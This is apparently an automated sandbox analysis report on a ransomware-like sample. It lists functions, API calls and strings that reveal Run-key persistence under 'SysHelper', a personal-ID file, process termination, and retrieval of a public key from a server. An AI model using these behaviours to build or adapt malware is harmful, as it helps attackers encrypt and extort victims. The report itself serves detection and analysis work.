                                                                                                  • __allrem.LIBCMT ref: 004236F3
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042370F
                                                                                                  • __allrem.LIBCMT ref: 00423726
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423744
                                                                                                  • __allrem.LIBCMT ref: 0042375B
                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00423779
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit_memset
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503770280-0
                                                                                                  • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction ID: ab95fd8d4aa8d0004faaa41ec126efad4d06c0b8c45c9850b5361983c80b405c
                                                                                                  • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                  • Instruction Fuzzy Hash: 6E7108B1B00726BBD7149E6ADC41B5AB3B8AF40729F54823FF514D6381E77CEA408798
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00465480 Relevance: 15.2, APIs: 7, Strings: 3, Instructions: 172COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,00000000,?,?,00000000), ref: 004654C8
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 004654D4
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,?,?,00000000), ref: 004654F7
                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00465503
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000008,?,?,?,00000000,?,?,00000000), ref: 00465531
                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,?,00000008,?,00000000,?,?,00000000), ref: 0046555B
                                                                                                  • GetLastError.KERNEL32(.\crypto\bio\bss_file.c,000000A9,?,00000000,?,?,00000000), ref: 004655F5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$ErrorLast
                                                                                                  • String ID: ','$.\crypto\bio\bss_file.c$fopen('
                                                                                                  • API String ID: 1717984340-2085858615
                                                                                                  • Opcode ID: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                  • Instruction ID: 21cfcf061b86b0f752f7d9b12bec731e5652c25b667fcf3b1ac9b742683446ef
                                                                                                  • Opcode Fuzzy Hash: 5bed85aa8c1b563afb7458887addcfa84ee938cd819de717f6d53dc9ad9ea7b7
                                                                                                  • Instruction Fuzzy Hash: 5A518E71B40704BBEB206B61DC47FBF7769AF05715F40012BFD05BA2C1E669490186AB
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425B6E Relevance: 15.1, APIs: 10, Instructions: 131COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 790675137-0
                                                                                                  • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
                                                                                                  • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                  • Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8
                                                                                                  • _fgetws.LIBCMT ref: 0040C7BC
                                                                                                  • _memmove.LIBCMT ref: 0040C89F
                                                                                                  • CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory__wfsopen_fgetws_memmove
                                                                                                  • String ID: C:\SystemID$C:\SystemID\PersonalID.txt
                                                                                                  • API String ID: 2864494435-54166481
                                                                                                  • Opcode ID: 2687d2ae6b49c93f0c531133de6504eda4fe3c90c802da0d025506fda68fa67b
                                                                                                  • Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
                                                                                                  • Opcode Fuzzy Hash: 2687d2ae6b49c93f0c531133de6504eda4fe3c90c802da0d025506fda68fa67b
                                                                                                  • Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52processCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
                                                                                                  • TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124B7
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004124CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                  • String ID: cmd.exe
                                                                                                  • API String ID: 2696918072-723907552
                                                                                                  • Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                  • Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
                                                                                                  • Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
                                                                                                  • Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(Shell32.dll), ref: 0040F338
                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathW), ref: 0040F353
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: SHGetFolderPathW$Shell32.dll$\
                                                                                                  • API String ID: 2574300362-2555811374
                                                                                                  • Opcode ID: 802c4dd66a51af63dd6bd345fe50592ac7cccf8316e7ed6c923d47920c69bc81
                                                                                                  • Instruction ID: 879cb2c41796572bb27552663435674e3d239ec9c812fe4031d18dca963833e9
                                                                                                  • Opcode Fuzzy Hash: 802c4dd66a51af63dd6bd345fe50592ac7cccf8316e7ed6c923d47920c69bc81
                                                                                                  • Instruction Fuzzy Hash: DFC15A70D00209EBDF10DFA4DD85BDEBBB5AF14308F10443AE405B7291EB79AA59CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040CBA0 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 240COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID: &#160;$Error encrypting message: %s$\\n
                                                                                                  • API String ID: 1783060780-3771355929
                                                                                                  • Opcode ID: 4712147b26bc4f14ef707d93ff7a8ffc9d4e18087ec61e0b99e0264c2fa8a27a
                                                                                                  • Instruction ID: bc568b6946d652cfd5b4c77746d66a5f57144f99ddafb1662d710ebef24806c3
                                                                                                  • Opcode Fuzzy Hash: 4712147b26bc4f14ef707d93ff7a8ffc9d4e18087ec61e0b99e0264c2fa8a27a
                                                                                                  • Instruction Fuzzy Hash: 10A196B1C00249EBEF10EF95DD46BDEBB75AF10308F54052DE40576282D7BA5688CBAA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00463350 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 148COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: .\crypto\pem\pem_lib.c$DEK-Info: $ENCRYPTED$Proc-Type:
                                                                                                  • API String ID: 909875538-2908105608
                                                                                                  • Opcode ID: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                  • Instruction ID: 5da15f4c8f0622be9955200bbf206a62195e74188b9aea783317ae4bc8ba6fc6
                                                                                                  • Opcode Fuzzy Hash: ab3012ab59146815ebf28714d7aa14745dda8ec0f3d5ba1861611fdbbd5b6dc0
                                                                                                  • Instruction Fuzzy Hash: B7413EA1BC83C129F721592ABC03F9763854B51B17F080467FA88E52C3FB9D8987419F
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0040C6A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                                  • RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                  • RegSetValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,00000004), ref: 0040C725
                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040C72E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseValue$OpenQuery
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion$SysHelper
                                                                                                  • API String ID: 3962714758-1667468722
                                                                                                  • Opcode ID: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                  • Instruction ID: 83d53c3b81c5c3826f22504a9cab54a14a7287ca0244f3776693af22b4817dfa
                                                                                                  • Opcode Fuzzy Hash: 1b3e89e7960631348278952d172054be4d8a3531237e516afd507403cd6f8071
                                                                                                  • Instruction Fuzzy Hash: 60112D7594020CFBDB109F91CC86FEEBB78EB04708F2041A5FA04B22A1D7B55B14AB58
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 0041E6E8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44stringnetworkfileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _memset.LIBCMT ref: 0041E707
                                                                                                    • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                                  • InternetOpenW.WININET ref: 0041E743
                                                                                                  • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                  • _memmove.LIBCMT ref: 0041E838
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                  • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                  • _strstr.LIBCMT ref: 0041EA36
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                  • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                  • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                  • _malloc.LIBCMT ref: 0041EB86
                                                                                                  • _memset.LIBCMT ref: 0041EB94
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                  • _strstr.LIBCMT ref: 0041EBDA
                                                                                                  • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                  • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                  • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Path$Internetlstrcpylstrlen$Folder$AppendFile$CloseDeleteHandleOpen_memset_strstr$ByteCharMultiReadWide_malloc_memmove_wcsstrlstrcat
                                                                                                  • String ID: bowsakkdestx.txt${"public_key":"
                                                                                                  • API String ID: 2805819797-1771568745
                                                                                                  • Opcode ID: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                  • Instruction ID: c8d03ce4d59ef2fdab541fe9505dce31f646fa9b39186cada3cd653a8fd1c75a
                                                                                                  • Opcode Fuzzy Hash: b1c6d5b9cc7872d960cbedbbf01e77bd4c23ed7d360ca7e20ceb3fbc707119fd
                                                                                                  • Instruction Fuzzy Hash: 3901D234448391ABD630DF119C45FDF7B98AF51304F44482EFD8892182EF78A248879B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004573F0 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 251COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __aulldvrm
                                                                                                  • String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
                                                                                                  • API String ID: 1302938615-3129329331
                                                                                                  • Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                  • Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
                                                                                                  • Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
                                                                                                  • Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 004306EC Relevance: 10.6, APIs: 7, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___unDName.LIBCMT ref: 0043071B
                                                                                                  • _strlen.LIBCMT ref: 0043072E
                                                                                                  • __lock.LIBCMT ref: 0043074A
                                                                                                  • _malloc.LIBCMT ref: 0043075C
                                                                                                  • _malloc.LIBCMT ref: 0043076D
                                                                                                  • _free.LIBCMT ref: 004307B6
                                                                                                    • Part of subcall function 004242FD: IsProcessorFeaturePresent.KERNEL32(00000017,004242D1,i;B,?,?,00420CE9,0042520D,?,004242DE,00000000,00000000,00000000,00000000,00000000,0042981C), ref: 004242FF
                                                                                                  • _free.LIBCMT ref: 004307AF
                                                                                                    • Part of subcall function 00420BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                    • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc$ErrorFeatureFreeHeapLastNamePresentProcessor___un__lock_strlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3704956918-0
                                                                                                  • Opcode ID: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                                                                                                  • Instruction ID: 67f118bcdaa5faec8c00adc58c02bfbdeebce6865ed580ae06d436c8457e8144
                                                                                                  • Opcode Fuzzy Hash: 491e64a43db57974c805febdf09b12bb5f9e435b923affe35b2a08799ec4d9db
                                                                                                  • Instruction Fuzzy Hash: 3121DBB1A01715ABD7219B75D855B2FB7D4AF08314F90922FF4189B282DF7CE840CA98
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50timewindowsleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • timeGetTime.WINMM ref: 00411B1E
                                                                                                  • timeGetTime.WINMM ref: 00411B29
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B4C
                                                                                                  • DispatchMessageW.USER32(?), ref: 00411B5C
                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411B6A
                                                                                                  • Sleep.KERNEL32(00000064), ref: 00411B72
                                                                                                  • timeGetTime.WINMM ref: 00411B78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000005.00000002.2024778410.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_400000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                                  • String ID:
                                                                                                  • API String ID: 3697694649-0
                                                                                                  • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                  • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                                  • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                                  • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00425141 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __init_pointers.LIBCMT ref: 00425141
                                                                                                    • Part of subcall function 00427D6C: EncodePointer.KERNEL32(00000000,?,00425146,00423FFE,00507990,00000014), ref: 00427D6F
                                                                                                    • Part of subcall function 00427D6C: __initp_misc_winsig.LIBCMT ref: 00427D8A
                                                                                                    • Part of subcall function 00427D6C: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004326B3
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004326C7
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004326DA
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004326ED
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00432700
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00432713
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00432726
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00432739
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0043274C
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0043275F
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00432772
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00432785
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00432798
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004327AB
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004327BE
                                                                                                    • Part of subcall function 00427D6C: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004327D1
                                                                                                  • __mtinitlocks.LIBCMT ref: 00425146
                                                                                                  • __mtterm.LIBCMT ref: 0042514F
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B62
                                                                                                    • Part of subcall function 004251B7: _free.LIBCMT ref: 00428B69
                                                                                                    • Part of subcall function 004251B7: DeleteCriticalSection.KERNEL32(0050AC00,?,?,00425154,00423FFE,00507990,00000014), ref: 00428B8B
                                                                                                  • __calloc_crt.LIBCMT ref: 00425174
                                                                                                  • __initptd.LIBCMT ref: 00425196
                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0042519D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2024778410.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000005.00000002.2024778410.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
